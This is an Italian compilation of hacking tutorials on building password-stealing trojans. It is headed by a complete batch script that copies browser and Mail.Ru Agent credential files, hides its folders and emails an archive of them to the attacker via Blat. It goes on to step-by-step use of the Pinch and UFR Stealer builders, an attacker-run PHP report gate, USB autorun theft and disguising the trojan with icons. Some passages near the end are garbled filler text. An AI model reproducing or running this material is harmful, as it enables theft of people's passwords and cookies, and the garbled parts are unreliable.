Creazione di un virus che ruba le password. Creiamo un Trojan per rubare le password. Come creare un trojan

In questo articolo descriverò quanto velocemente e senza troppe difficoltà puoi scrivere e creare un virus che rubi file con password e li invii tutti alla tua casella di posta.
Cominciamo con il fatto che il virus verrà scritto in bat"e (CMD, puoi prendere i comandi di base), cioè in un normale file di testo e verrà eseguito utilizzando l'interprete standard integrato di Windows: la "riga di comando ".
Per scrivere un virus di questo tipo, è necessario conoscere l'esatta posizione di archiviazione dei file che ruberà, componenti Blat che possono essere scaricati dal sito http://www.blat.net/ o dal nostro server, così come un componente dell'archiviatore WinRaR Rar.exe (puoi farne a meno).
Apri il blocco note e copia lì il seguente codice:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attributo %systemroot%\wincs +h +s +r attributo %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copia /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copia /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copia /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copia /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ passa rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe ESCI cls

Non scriverò molto sul codice dello stivale stesso.
@echo off - nasconde il corpo della batinka (quindi non è necessario, ma comunque)
md %systemroot%\wincs: crea la cartella wincs nella cartella di sistema di Windows, indipendentemente dall'unità su cui è installato o dal nome.
md %SystemDrive%\pass\: crea la cartella pass sul disco in cui è installato il sistema Windows.
md %SystemDrive%\pass\opera\ - crea la cartella opera in cui verranno copiati wand.dat e cookies4.dat dal browser Opera in futuro (fino a 11* versioni, Opera memorizza le sue password nel file wand.dat)
md %SystemDrive%\pass\Mozilla\- crea una cartella Mozilla in cui verranno copiati in futuro i file del browser Mozilla (cookies.sqlite, key3.db, signons.sqlite) in cui sono archiviate le password.
md %SystemDrive%\pass\MailAgent\- crea una cartella MailAgent in cui verranno copiati i file contenenti la cronologia della corrispondenza e le chiavi di registro (che memorizzano le password) da Mail Agent.
md %SystemDrive%\pass\MailAgent\reg- crea una cartella reg
attributo %systemroot%\wincs +h +s +r- inserisce gli attributi nella cartella wincs, nascondendola così alla vista.
attributo %SystemDrive%\pass +h +s +r- lo stesso di sopra.
copia /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- copia il file blat.exe dalla posizione di caricamento nella cartella wincs
copia /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- copia il file blat.dll dal percorso di caricamento nella cartella wincs
copia /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- copia il file blat.lib dalla posizione di caricamento nella cartella wincs
CD /D %APPDATA%\Opera\Opera\ - va alla cartella dell'opera dove si trovano i file con password (e altre cose) per l'opera.
copia /y wand.dat %SystemDrive%\pass\opera\wand.dat- copia il file wand.dat nella cartella opera
copia /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- copia il file cookie4.dat nella cartella opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- esporta la chiave di registro magent_logins2, in cui è archiviata la password, nella cartella reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- esporta la chiave di registro magent_logins3, dove è memorizzata la password, nella cartella reg
CD /D %APPDATA%: vai alla cartella AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- copia il contenuto della cartella Mra\Base nella cartella MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- copia il file ver.txt nella cartella MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- vai alla cartella con il profilo del browser Mozilla
copia /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- copia il file cookies.sqlite nella cartella Mozilla
copia /y key3.db %SystemDrive%\pass\Mozilla\key3.db- copia il file key3.db nella cartella Mozilla
copia /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- copia il file signons.sqlite nella cartella Mozilla
copia /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- copia il componente archiviatore WinRar Rar.exe nella cartella pass
del /s /q %SystemRoot%\Rar.exe- rimuove il componente archiver dalla cartella Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archiviare il contenuto della cartella pass
copia /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar copiare l'archivio creato nella cartella wincs
cd %systemroot%\wincs - vai alla cartella wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepara il programma Blat per l'invio dell'archivio specificando i dati per l'autorizzazione e l'invio della lettera. Non dimenticare di indicare i tuoi dati dalla casella di posta da dove sarà la lettera con l'archivio inviato.
ren *.rar pass.rar - nel caso in cui l'archivio non abbia preso il nome sbagliato durante il processo, lo rinomineremo nuovamente in pass.rar
%systemroot%\wincs\blat.exe -body File Password -to [email protected] -attaccare %systemroot%\wincs\pass.rar- indicare a quale indirizzo postale verrà inviata la lettera e spedirla.
rmdir /s /q %Unitàdisistema%\pass- eliminare la cartella della tessera
rmdir /s /q %systemroot%\wincs- eliminare la cartella wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- rimuovere i componenti Blat dalla cartella Windows.
del /s /q %systemroot%\blat.lib- rimuovere i componenti Blat dalla cartella Windows.
attrib +a +s +h +r %systemroot%\wind.exe- ci attribuiamo degli attributi, nascondendoci così alla vista.
USCITA: completiamo il processo batch e usciamo.
cls: cancella l'output di qualsiasi riga nell'interprete.
Copiato, salvato come wind.bat e compilato in exe utilizzando il programma di conversione Bat in exe, quindi mettiamo tutto insieme, cioè prendiamo i componenti del programma Blat e il componente archiviatore WinRar (che puoi scaricare) e li incolliamo un file eseguibile o con quale qualsiasi programma, il percorso per caricare tutti i file dovrebbe essere %SystemRoot% o %WindowsDir% o %windir% .
Di conseguenza, otteniamo un virus che non verrà rilevato dagli antivirus e invierà un archivio con file alla tua email. I file che arrivano via email possono essere decrittografati utilizzando il ripristino di più password, sebbene non tutti, ma solo wand.dat dall'opera e poi se non è stato aggiornato alle versioni 11* tutti gli altri file possono essere decrittografati sostituendoli con i propri.
Penso che possiamo finire qui, ma se avete domande, non esitate a chiedere.
Grazie per l'attenzione, tutto il meglio!
©SwAp TheHackWorld.in

Persone!!!
Ora ti dirò come creare il tuo virus Trojan (quasi tuo)!

Quello che ti serve:
cervelli - 1 pezzo., computer - 1 pezzo., Accesso a Internet - 1 pezzo., Pinch (costruttore) - 1 pezzo., server (per rapporti Trojan) - 1 pezzo., Parser (per decrittografare rapporti).

Forse è tutto...

Ora, come sempre, una breve storia.

Troiani
..erano conosciuti circa 33 secoli fa

Nel XII secolo a.C. La Grecia dichiarò guerra alla città di Troia.
Il conflitto sorse quando un principe troiano rapì la regina Elena di Sparta e annunciò che voleva farla sua moglie. Ciò naturalmente fece arrabbiare i greci, in particolare il re di Sparta. I Greci assediarono Troia per 10 anni, ma senza successo, perché... Troia era ben fortificata.
In un ultimo sforzo, l'esercito greco finse di ritirarsi e lasciò dietro di sé un enorme cavallo di legno. I Troiani videro il cavallo e, pensando che fosse un dono dei Greci, lo trascinarono in città, senza rendersi conto che all'interno del cavallo di legno vuoto sedevano i migliori soldati greci.
Col favore dell'oscurità, i soldati uscirono, aprirono le porte della città e più tardi, insieme all'esercito rimasto, uccisero l'intero esercito troiano. Come un cavallo di legno, il programma
Il cavallo di Troia finge di fare una cosa, ma in realtà fa qualcosa di completamente diverso.

Alexey Demchenko - Il russo Kul Khatsker è anche conosciuto come "aka coban2k"
L'autore di molti programmi, e il suo migliore (secondo me) è PINCH, il Trojan più comune su Internet! Conosce molti linguaggi di programmazione in particolare: C++, Pascal, Delphi, MySQL, PHP, XML e molti altri. In generale vi consiglio di andare sul suo sito personale www.cobans.net, lì troverete qualche informazione su di lui.

In particolare stiamo considerando il programma Pinch (Pinch 2.58)
Pinch 2.58 è un Builder, un compilatore di virus Trojan... perché... nel builder attaccherai alcune funzioni del Trojan... ad esempio: rubare password da ICQ, TheBat, FAT, cookie del browser (questo è il più popolare).
MA non è tutto, Pinch può anche: creare/modificare un determinato parametro nel Registro, cancellarsi al termine del lavoro, creare una “Blue Screen of Death”, o meglio ancora, creare un server (console) sul computer della vittima (BackDoor ), dopodiché il computer della vittima diventa di tua proprietà (letteralmente). Puoi effettuare attacchi DDOS attraverso il suo computer tramite il suo indirizzo IP e in questo momento mantenere la tua sovranità anonima.
Non pensare di poter avere un solo computer a tua disposizione. Puoi averne quanti ne vuoi, ma questo si chiama già BotNet...

Bene, questo è tutto, cominciamo...

Guarda come appare il Pinch Builder di seguito:

Figura 1.1

Aggiunto dopo 55 secondi
Ora ti spiego come funziona il Trojan...

1. È possibile compilare il Trojan in modo che i report vengano inviati all'e-mail specificata. Ma possono bruciarti (cioè il tuo Trojan) perché... la tua vittima potrebbe avere SP2 (Windows XP Service Pack 2)), il che significa che anche FireWall ha... FireWall non attiverà mai (senza il tuo permesso) la porta 25 (SMTP), il che significa che Troy non sarà in grado di inviare il rapporto della vittima a E-mail. (i mailer famosi come mail.ru, yandex.ru, ecc. non ricevono rapporti) Usa il mailer http://goolook.ru Ma comunque non consiglio di usare SMTP!

2. È possibile compilare il Trojan in modo che i rapporti vengano inviati al server specificato.
È più sicuro perché al momento dell'invio della segnalazione, Pinch si manifesta come:
Nome del processo: iexplorer.exe
Protocollo: http
Indirizzo remoto: www.YOUR_SERVER.xxx/get.php
FireWall non può impedire il processo "iexplorer.exe" (e se potesse, non vedresti nulla sul monitor del tuo computer (tranne l'immagine del desktop))
Protocollo: http:// significa porta “80” (NESSUN COMMENTO)

Quindi oggi parleremo del “2°”, ho già detto sì (?) che questo è meglio.

Diamo un'occhiata ad altre gare su Builder >>>

Figura 1.1

1. Fare clic sulla scheda "HTTP" e selezionare il protocollo "HTTP".

2. Nel campo URL, inserisci l'indirizzo del tuo sito web (server), ad esempio: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
Ci concentreremo su questo in modo più dettagliato...
Affinché Pinch possa inviarti report tramite http://, hai bisogno di un server (chiamiamolo semplicemente “sito”) e quindi hai bisogno di un sito I QUALI SCRIPT PHP DEVONO OBBLIGATORIAMENTE FUNZIONARE!!! Il migliore di questi è http://jino-net.ru
È vero, ho detto che esiste anche http://onepage.ru/ ma il server è stato distrutto.
Continuiamo...
Quindi, registrati su http://jino-net.ru con qualsiasi dominio e qualsiasi password J).
Ti sei registrato?
Penso di si…
Continuiamo...
Diciamo che ti sei registrato con il dominio http://petia_lox.jino-net.ru
Andiamo all'FTP del tuo sito. Sai cos'è l'FTP? Ehhhh... devo dirtelo, perché mi ricordo di me...
FTP è il contenuto del tuo sito... cioè, utilizzando il protocollo FTP (porta 21), arrivi alla radice del tuo sito dove sono contenute diverse directory/cartelle/file, ecc.

Andiamo su Google.ru e scarichiamo il programma “cuteFTP”... Forse lo farò io per te.
Andiamo qui >>>
http://www.google.ru/search?hl=ru&q=cuteFTP+download&btnG=Search+in+Google&lr=
Mi piace di più il quarto collegamento.
Scarica CuteFTP 7.1 + Russifier
Andiamo >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
Penso che dopo scoprirai come scaricare il programma e come installarlo.

Aggiunto dopo 1 minuto
Scaricato, installato, russificato... continuiamo...

Ora vai all'FTP del tuo sito. Vai alla cartella /docs/, crea una cartella qualsiasi in questa cartella, ad esempio "mail_p", assegna a questa cartella i diritti CHMOD 777 (fai clic con il pulsante destro del mouse sulla cartella nel menu contestuale, trova il parametro "CHMOD" o "Proprietà" in diverse versioni del programma CuteFTP, traduzioni diverse)
Ora carica il file in questa cartella (mail_p). Cos'è un guadagno?
“Get” questo script di gate per ricevere report da pinch ha l'estensione “.php”
Puoi trovarlo qui >>>
http://pinch3.ru/other/gate.txt
Crea un file di testo del Blocco note sul tuo computer e copia il testo del cancello
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> dai l'estensione al file di testo.php (prima era .txt)

Lo script è pronto, rinominalo “mail” e caricalo sull'FTP del tuo sito nella cartella /docs/mail_p/
E concedi i diritti CHMOD a questo file 777.

Ricorda questo posto, ora i rapporti verranno inviati a questa cartella dove si trova il get (/docs/mail_p/).

Quindi scriviamo nel campo URL (nel builder se non l'hai ancora dimenticato)
http://petia_lox.jino-net.ru/mail_p/mail.php (hai il tuo indirizzo)

3. Guardiamo >>>

Figura 1.2

Crea tutte le caselle di controllo come nella Figura 1.2
Non selezionare la casella sopra il parametro "Opera", altrimenti il ​​rapporto non verrà decrittografato (leggi sotto).

Puoi già compilare... ma vedremo anche altre funzioni aggiuntive (anche se a volte sono addirittura necessarie)...

Scheda “PWD”, sappiamo già di cosa si tratta)
La scheda "Esegui" serve, diciamo, per migliorare l'intelligenza di Pinch, cioè per cancellarsi, per salvare i file .dll in Windows e molto altro ancora.
Scheda Spia. Invia uno screenshot del monitor della vittima per salvare IE KeyLog, ecc.
Scheda "NET" per i comandi della console PHP notifica/non so il resto...
Il mio amato BegDor non ha mai usato la scheda "BD" di Pinch'a...
La scheda "etc" per comprimere il Trojan, per modificare l'icona del Trojan.
Scheda "Kill" per uccidere qualsiasi processo (ad esempio FireWall)
Scheda "IE": gestisci IE, aggiungi un sito ai preferiti, segui un collegamento.
Non conosco la scheda "Worm"... qualcosa che ha a che fare con i DNSsec.
La scheda "IRC-bot" è fondamentalmente per la bottrack. regole BOTNET)!!!

Ritorna alla scheda PWD e fai clic sul pulsante (in basso) “COMPILE”

EVVIVA!!! TROJAN E' PRONTO!!!


Hacking Come creare un virus Trojan. Pizzico (per lamer)

Il conflitto sorse quando un principe troiano rapì la regina Elena di Sparta e annunciò che voleva farla sua moglie. Ciò naturalmente fece arrabbiare i greci, in particolare il re di Sparta. I Greci assediarono Troia per 10 anni, ma senza successo, perché... Troia era ben fortificata.

In un ultimo sforzo, l'esercito greco finse di ritirarsi e lasciò dietro di sé un enorme cavallo di legno. I Troiani videro il cavallo e, pensando che fosse un dono dei Greci, lo trascinarono in città, senza rendersi conto che all'interno del cavallo di legno vuoto sedevano i migliori soldati greci.

Col favore dell'oscurità, i soldati uscirono, aprirono le porte della città e più tardi, insieme all'esercito rimasto, uccisero l'intero esercito troiano.

Appunti di un giovane amministratore

Un paio di giorni fa, uno dei miei amici ha lasciato dei graffiti sulla mia bacheca dei contatti con un messaggio che diceva che aveva violato il mio account, ecc. c'era un collegamento al sito vk-****.msk.ru. Beh si. Certamente.) Gli ho scritto subito per farsi curare e cambiare la password. Ma il collegamento mi interessava ancora, anche se sapevo per certo che si trattava di un Trojan (questo era ciò che mi interessava). Ho deciso di seguire questo collegamento. Di conseguenza, mi è stato offerto di scaricare un programma che presumibilmente sfrutta una vulnerabilità di contatto scoperta di recente e consente di hackerare qualsiasi account.

Istruzioni per creare un Trojan per rubare le password

Una breve guida per rubare soldi dall'online banking Hacking Territorio: HackZona 28 dicembre 2010 Tutto su come creare siti web, blog, forum, negozi online e promuoverli in Se sia necessario utilizzare qualche tipo di Trojan per questo, non lo so . le mie password di casa sono estremamente complesse, quindi spero che possano essere violate. originario dell'Ucraina (registrazione, recensioni e opportunità di Likpay) Creazione di un Trojan per rubare password! — YouTube 1 novembre 2012 se non capisci scrivi su Skype: comrad714 nome del programma UFR stealer 3.0.1.0.

Come creare un trojan

Preparati, dobbiamo scrivere due programmi contemporaneamente. Uno sarà sul tuo computer (client), l'altro dovrà essere inviato alla vittima (server). Ci sarà molto lavoro, quindi meno parole e più vicino al corpo.

Quindi, avvia Delphi o, se lo hai già in esecuzione, crea un nuovo progetto (“File” – “Nuova applicazione”). Ora passeremo alla parte server del Trojan.

Qui dovresti spostare “Da1” dalla sezione “Creazione automatica moduli” (elenco a sinistra) a “Moduli disponibili” (elenco a destra), come ho fatto io.

Come creare un trojan

Penso che ogni lettore conosca l'origine e il significato del detto "cavallo di Troia". Il principio di funzionamento del virus Trojan è più o meno lo stesso (da qui il nome). Esistono molti tipi di questo virus, oggi mi concentrerò su una delle opzioni per creare un programma trojan basato sugli sviluppi di Alexey Demchenko o, come viene anche chiamato, "aka coban2k", che è l'autore di un numero enorme di programmi, incluso PINCH, che è diventato il Trojan più comune sul World Wide Web!

Come creare un programma Trojan.

Abbiamo creato i Trojan e ora stiamo creando anche un Trojan per rubare le password!

Qui ti dirò come creare un semplice Trojan per rubare password da ICQ, Vkontakte, Odnoklassniki, Mail. eccetera. 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%

Ora apri il file “1.bat” con il blocco note. e cambia le parole "Accedi" con il tuo login da Yandex mail. e cambia la parola "Password" con la password della tua posta Yandex.

Aspettiamo. download completato.

Creiamo un Trojan che ruba tutte le password dai browser (come promesso)

Quindi prima dobbiamo scaricare il programma UFR Stealer, questo può essere fatto sul sito ufficiale vazonez.com o tramite il collegamento >> http://rghost.ru/55883641

Poi andiamo su “build options” e clicchiamo sull'icona cambia in modo che il nostro Trojan assomigli ad un vero programma, oppure clicchiamo su unisci file (è meglio che la vittima lanci il programma con cui è stato incollato il trojan, e insieme al programma il Trojan stesso)

Creazione di un trojan per rubare le password

Il piano operativo del virus è il seguente: si lancia, scansiona tutte le cartelle del PC e copia i file necessari (tramite maschera, ad esempio, *.txt. pass*, ecc.) su una chiavetta USB.

Abilita una modalità di elaborazione dei comandi estesa, ovvero consente costruzioni complesse come due comandi in una condizione e altri. Non ridere, perché per Batch è molto bello.

Successivamente, è necessario ricordare il percorso della directory da cui è stato avviato il file batch (dobbiamo copiare i dati sulla nostra unità flash e non su un disco rigido) perché il codice successivo confonde il valore della variabile CD ( cartella di lavoro corrente).

Alla fine del suo lavoro, il Trojan creerà un file ready.txt per farci sapere che ha finito di funzionare (renderemo il Trojan invisibile, senza console).

Trojan per rubare la password VKontakte, scarica il programma di installazione

In una colonna un trojan che ruba la password in Contact blocca il gioco su PS3. Per rubare la password, il trojan tiene conto delle coordinate geografiche del proprietario per rubare il materiale riconosciuto. Tenendo conto delle azioni dell'utente, il trojan della password consente di personalizzare la visualizzazione per la comunicazione nel sistema.

Per la comunicazione, i trojan delle password e la negoziazione automatica forniscono strumenti di creazione all'avanguardia.

Trojan per il furto di password

Proprio come il lavoro d'ufficio, fornisce una facile navigazione sotto forma di disco virtuale. Active Control annuncia il rilascio di un prodotto per lavorare con i segnalibri. Lo spazio lineare definisce la loro posizione esatta per impedirne l'acquisizione.

Power Batch è alla ricerca di un argomento della guida per limitare il traffico. La dimensione piuttosto ampia del panificio permette di visualizzare i report. Tenendo premuti i tasti per raffreddarsi, il Trojan che ruba la password, come la modifica individuale, comporta il trasferimento completo dei dati.

Troiani #9

Antivirus Stealer: decomprimi questo programma, copia 2 file e una cartella su un'unità flash (Antivirus.bat, autorun.inf, prog) e puoi andare con i tuoi amici con l'unità flash! Inserisci la chiavetta nel computer, fai clic su Antivirus.bat, quando si ferma puoi chiuderlo ed estrarre la chiavetta, tutte le password che hai sul tuo computer sulla chiavetta, verranno archiviate nella cartella "prog ” -> cartella “log”.

Qui ti dirò come creare un semplice Trojan per rubare password da ICQ, Vkontakte, Odnoklassniki, Mail... ecc., ecc....
Cominciamo... prima abbiamo bisogno di alcuni programmi:
Multi Password Recovery: un'utilità per il recupero delle password dimenticate
blat è un client di posta elettronica.
Convertitore da Bat a Exe: convertitore di formato bat-exe.
Puoi scaricare tutto questo in un unico archivio:

Devi essere registrato per vedere i link.


Scaricalo e decomprimilo in una cartella separata...
Ora apri il file "1.bat" con il blocco note... e cambia le parole "Login" con il tuo login da Yandex mail... e cambia la parola "Password" con la tua password da Yandex mail...



Salva e chiudi...
Ora apri "Bat_To_Exe_Converter"...
Nel campo "File batch", indica il file che hai salvato "1.bat"
Il campo "Salva con nome" non può essere modificato...
Configurare le impostazioni come mostrato di seguito:



Ora vai alla scheda "Includi"...
E trasferisci lì tutti i file dalle cartelle "blat" e "MPR...".



Dovrebbero essercene esattamente sette!!! Come mostrato sopra!!!
Bene, ora aggiungiamo un'icona al nostro Trojan... questo non è necessario, ma assomiglia più a una specie di programma...
Vai alla scheda "Informazioni sulla versione" e nel campo "Fia icona" seleziona l'icona....
Fare clic su "Compila"...
Aspettiamo... che il download sia completato... e controlliamo la cartella con il file "1.bat"... il tuo Trojan "1.exe" dovrebbe essere apparso lì (puoi chiamarlo come preferisci

)...
Bene, ora controlliamo... avvia il Trojan sul nostro computer e attendi... tra 30 secondi... un file verrà inviato alla tua email... scaricalo (le password sono memorizzate al suo interno)
Scaricato... ora lo lanciamo tramite "MPR" e ammiriamo le password




Superiore